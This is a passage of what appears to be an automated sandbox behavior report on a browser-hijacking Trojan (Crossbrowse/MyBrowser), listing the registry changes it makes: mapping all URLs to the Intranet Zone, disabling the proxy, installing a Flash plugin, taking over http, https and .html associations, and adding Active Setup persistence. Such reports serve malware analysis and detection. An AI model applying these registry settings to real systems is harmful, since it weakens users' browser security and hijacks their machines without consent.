"BaseClass" = "Drive"
[HKLM\SOFTWARE\Crossbrowse]
"Preinstall" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\CrossBrowser]
"Installation" = "1"
[HKCU\Software\Crossbrowse]
"Preinstall" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7E 22 74 55 27 E0 3C AF E0 EB D4 30 1D 68 9E 72"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Tempo]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process chrome.exe:2304 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "86 64 4B A8 29 FD EA EF 2A F8 9A 97 29 57 A9 23"
The process chrome.exe:2268 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "50 C3 C4 EC 04 6A 3C 23 66 3A 29 9F B0 E7 23 CE"
The process chrome.exe:2216 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DE 9E 04 10 1F 36 59 98 E9 F7 D8 2A 62 07 1C 40"
The process chrome.exe:1980 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7C B3 A0 D8 2C 8A DC D5 DD CF C4 2F 08 04 E3 66"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\Chromium]
"usagestats" = "0"
"_NumAccounts" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\ServiceCtlGuid]
"Guid" = "0c5a3172-2248-44fd-b9a6-8389cb1dc56a"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\CtlGuid]
"BitNames" = " DOT11_ASSOCIATE DOT11_ROAMING DOT11_1X DOT11_PNP DOT11_SCAN DOT11_RECEIVE DOT11_SEND DOT11_IOCTL DOT11_OID DOT11_MISC DOT11_UPCALL DOT11_KEYMGR DOT11_PEER DOT11_SOFTAP DOT11_PAM DOT11_REPEATER DOT11_APROUTER DOT11_WME DOT11_CONFIG DOT11_MSM DOT11_MSM_ADAPT DOT11_MSM_SCAN DOT11_MSM_CONNECT DOT11_MSM_SECURITY_PKT DOT11_NOTIFY_OBJECT"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\DiagL2SecCtlGuid]
"Guid" = "2e8d9ec5-a712-48c4-8ce0-631eb0c1cd65"
[HKCU\Software\Chromium]
"_NumSignedIn" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\WDiagCoreCtlGuid]
"BitNames" = " WD_LOG_FLAG_INIT WD_LOG_FLAG_RPC WD_LOG_FLAG_EVENT WD_LOG_FLAG_INTERFACE WD_LOG_FLAG_CONNECTION WD_LOG_FLAG_CONTROL WD_LOG_FLAG_LOCKS WD_LOG_FLAG_MEMORY WD_LOG_FLAG_REFERENCES WD_LOG_FLAG_FUNCTION_TRACE WD_LOG_FLAG_ASSERT"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\WDiagCoreCtlGuid]
"Guid" = "637a0f36-dff5-4b2f-83dd-b106c1c725e2"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\ServiceCtlGuid]
"BitNames" = " DOT11_AUTOCONF DOT11_AUTOCONF_CLIENT DOT11_AUTOCONF_UI DOT11_FATMSM DOT11_COMMON DOT11_WLANGPA DOT11_CLASS_COINSTALLER"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\WLanDiagCtlGuid]
"BitNames" = " WLANHC_AUTOCONFIG WLANHC_RNWFMSM WLANHC_FATMSM WLANHC_DLLMAIN WLANHC_TEST"
"Guid" = "6da4ddca-0901-4bae-9ad4-7e6030bab531"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\CtlGuid]
"Guid" = "d905ac1c-65e7-4242-99ea-fe66a8355df8"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\DiagL2SecCtlGuid]
"BitNames" = " SECHC_LOG_FLAG_ASSERT SECHC_LOG_FLAG_INIT SECHC_LOG_FLAG_DIAG SECHC_LOG_FLAG_ONEX_DIAG SECHC_LOG_FLAG_REPAIR SECHC_LOG_FLAG_STATE SECHC_LOG_FLAG_EXT SECHC_LOG_FLAG_EVENT_LOG SECHC_LOG_FLAG_FUNCTION SECHC_LOG_FLAG_MEMORY SECHC_LOG_FLAG_LOCKS"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW]
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW]
"DWFileTreeRoot"
The process chrome.exe:2252 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "33 0D B1 17 4A 1B 1D D1 BA 36 7F 95 C3 A2 EF 69"
The process nsq21.tmp:168 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3D 0E FD D6 4D 3A C1 62 1C F6 4F 9C 45 66 DB B7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nso13.tmp:508 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0F 6D F5 DD F2 1F 66 FB 4F EB 85 68 96 BF 04 5A"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process 6481.exe:1988 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Crossbrowse]
"Preinstall" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Crossbrowse]
"Preinstall" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 12 6B 3B 47 93 71 4E B1 66 55 0C 08 15 4C F9"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process tmp25.tmp:3448 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Macromedia\FlashPlayerPepperReleaseType]
"Release" = "1"
[HKLM\SOFTWARE\Macromedia\FlashPlayerPepper]
"UninstallerPath" = "%System%\Macromed\Flash\FlashUtil32_18_0_0_209_pepper.exe"
"Version" = "18.0.0.209"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player PPAPI]
"UninstallString" = "%System%\Macromed\Flash\FlashUtil32_18_0_0_209_pepper.exe -maintain pepperplugin"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Macromedia\FlashPlayerPepper]
"isScriptDebugger" = "0"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player PPAPI]
"NoRepair" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player PPAPI]
"URLUpdateInfo" = "http://www.adobe.com/go/getflashplayer/"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Direct3D\MostRecentApplication]
"Name" = "tmp25.tmp"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player PPAPI]
"EstimatedSize" = "18748"
"HelpLink" = "http://www.adobe.com/go/flashplayer_support/"
"NoModify" = "1"
"URLInfoAbout" = "http://www.adobe.com"
"VersionMinor" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FlashUtil32_18_0_0_209_pepper.exe]
"DisableExceptionChainValidation" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player PPAPI]
"DisplayVersion" = "18.0.0.209"
"DisplayName" = "Adobe Flash Player 18 PPAPI"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2D EB 7C 00 89 35 00 8C 11 89 CB 0A 3C 14 95 F4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player PPAPI]
"VersionMajor" = "18"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Macromedia\FlashPlayerPepper]
"PlayerPath" = "%System%\Macromed\Flash\pepflashplayer32_18_0_0_209.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player PPAPI]
"Publisher" = "Adobe Systems Incorporated"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Extended Properties\{2CA4F306-B280-4ab2-B5E1-1DFA3583F046}\%System%]
"FlashPlayerCPLApp.cpl" = "10"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player PPAPI]
"RequiresIESysFile" = "4.70.0.1155"
"DisplayIcon" = "%System%\Macromed\Flash\FlashUtil32_18_0_0_209_pepper.exe"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
[HKCU\Software\Macromedia\FlashPlayer]
"ConflictingProcs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
[HKCU\Software\Macromedia\FlashPlayer]
"RerunInUIMode"
The process setup.exe:576 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"IconsVisible" = "1"
[HKCU\Software\Classes\ftp\shell]
"(Default)" = "open"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\MyBrowser\Installer]
"Name" = "MyBrowser"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities]
"ApplicationDescription" = "MyBrowser is a web browser that runs webpages and applications with lightning speed. It's fast, stable, and easy to use. Browse the web more safely with malware and phishing protection built into MyBrowser."
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"smsto" = "CRSBRWSHTML"
[HKCR\https\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"DisplayIcon" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\MyBrowser\Installer]
"UninstallArguments" = " --uninstall --system-level"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"VersionMinor" = "95"
[HKCR\.html\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"DisplayVersion" = "39.5.2171.95"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities]
"ApplicationName" = "MyBrowser"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"InstallDate" = "20151029"
[HKCU\Software\Classes\http\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"StubPath" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe --configure-user-settings --verbose-logging --system-level"
[HKCR\.html]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp]
"URL Protocol" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"nntp" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".xhtml" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"mailto" = "CRSBRWSHTML"
[HKCU\Software\Classes\.xht]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files%\MyBrowser\MyBrowser,"
[HKCU\Software\Classes\.html]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"VersionMajor" = "2171"
[HKCU\Software\Classes\.shtml]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\https\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe"
[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}\LocalServer32]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\delegate_execute.exe"
[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}]
"(Default)" = "CommandExecuteImpl Class"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"irc" = "CRSBRWSHTML"
[HKCR\ftp\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"https" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"IsInstalled" = "1"
"Version" = "24,0,0,0"
[HKCR\https\shell]
"(Default)" = "open"
[HKCR\.xhtml]
"(Default)" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\mybrowser.exe]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe"
[HKCR\.xht\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\Startmenu]
"StartMenuInternet" = "MyBrowser"
[HKCU\Software\Classes\http\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
